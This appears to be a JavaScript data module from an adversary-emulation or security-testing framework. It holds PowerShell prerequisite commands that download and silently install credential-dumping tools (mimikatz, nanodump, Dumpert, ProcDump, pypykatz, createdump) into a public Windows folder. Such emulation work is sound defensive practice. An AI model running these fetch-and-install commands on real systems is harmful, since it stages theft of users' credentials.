const WIN_PREREQS = {
  "3ae905fe6171f9d0fbefd9cb6b8d6a82": `if (Test-Path "C:\\Users\\Public\\procdump.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\procdump.exe" } else { Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/Procdump.zip' -OutFile 'C:\\Users\\Public\\payload.zip'; Expand-Archive -Path 'C:\\Users\\Public\\payload.zip' -DestinationPath 'C:\\Users\\Public\\payload_extract' -Force; Copy-Item 'C:\\Users\\Public\\payload_extract\\procdump64.exe' 'C:\\Users\\Public\\procdump.exe' -Force; Remove-Item 'C:\\Users\\Public\\payload.zip' -Force; Remove-Item 'C:\\Users\\Public\\payload_extract' -Recurse -Force }`,
  "54643bf2018c940ca5fc21097884d2d4": `if (Test-Path "C:\\Users\\Public\\procdump.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\procdump.exe" } else { Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/Procdump.zip' -OutFile 'C:\\Users\\Public\\payload.zip'; Expand-Archive -Path 'C:\\Users\\Public\\payload.zip' -DestinationPath 'C:\\Users\\Public\\payload_extract' -Force; Copy-Item 'C:\\Users\\Public\\payload_extract\\procdump64.exe' 'C:\\Users\\Public\\procdump.exe' -Force; Remove-Item 'C:\\Users\\Public\\payload.zip' -Force; Remove-Item 'C:\\Users\\Public\\payload_extract' -Recurse -Force }`,
  "505f7b839938e8cea8db2dc9a4448f57": `if (Test-Path "C:\\Users\\Public\\nanodump.x64.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\nanodump.x64.exe" } else { Invoke-WebRequest -Uri 'https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe' -OutFile 'C:\\Users\\Public\\nanodump.x64.exe' }`,
  "990a4629d154622098b70ba50384051f": `if (Test-Path "C:\\Users\\Public\\nanodump.x64.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\nanodump.x64.exe" } else { Invoke-WebRequest -Uri 'https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe' -OutFile 'C:\\Users\\Public\\nanodump.x64.exe' }`,
  "03455985e8bf5d2ee43947cadaca2256": `if (Test-Path "C:\\Users\\Public\\Outflank-Dumpert.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\Outflank-Dumpert.exe" } else { Invoke-WebRequest -Uri 'https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe' -OutFile 'C:\\Users\\Public\\Outflank-Dumpert.exe' }`,
  "7e8ccbe3de961012b6464485829e87a4": `if (Test-Path "C:\\Users\\Public\\x64\\mimikatz.exe") { Write-Host "ALREADY_PRESENT: C:\\Users\\Public\\x64\\mimikatz.exe" } else { New-Item -ItemType Directory -Force -Path 'C:\\Users\\Public\\x64'; Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile 'C:\\Users\\Public\\payload.zip'; Expand-Archive -Path 'C:\\Users\\Public\\payload.zip' -DestinationPath 'C:\\Users\\Public\\payload_extract' -Force; Copy-Item 'C:\\Users\\Public\\payload_extract\\x64\\mimikatz.exe' 'C:\\Users\\Public\\x64\\mimikatz.exe' -Force; Remove-Item 'C:\\Users\\Public\\payload.zip' -Force; Remove-Item 'C:\\Users\\Public\\payload_extract' -Recurse -Force }`,
  "7d1c6222726c67b13740450275dc2162": `Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe' -OutFile 'C:\\Users\\Public\\python_setup.exe'; Start-Process -FilePath 'C:\\Users\\Public\\python_setup.exe' -ArgumentList '/quiet InstallAllUsers=1 PrependPath=1 Include_test=0' -Wait; Remove-Item 'C:\\Users\\Public\\python_setup.exe' -Force; $env:Path = [System.Environment]::GetEnvironmentVariable('Path','Machine') + ';' + [System.Environment]::GetEnvironmentVariable('Path','User'); pip install pypykatz`,
  "8e01631039faf6a9a84df376bf9ad0f1": `if (Test-Path "$env:ProgramFiles\\dotnet\\shared\\Microsoft.NETCore.App\\5*\\createdump.exe") { Write-Host "ALREADY_PRESENT: $env:ProgramFiles\\dotnet\\shared\\Microsoft.NETCore.App\\5*\\createdump.exe" } else { $url = "https://download.visualstudio.microsoft.com/download/pr/a0832b5a-6900-442b-af79-6ffddddd6ba4/e2df0b25dd851ee0b38a86947dd0e42e/dotnet-runtime-5.0.17-win-x64.exe"; $out = "$env:Temp\\dotnet-runtime-5.0.17.exe"; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process -FilePath $out -ArgumentList "/install /quiet /norestart" -Wait; Remove-Item $out -Force }`,
}

export default WIN_PREREQS
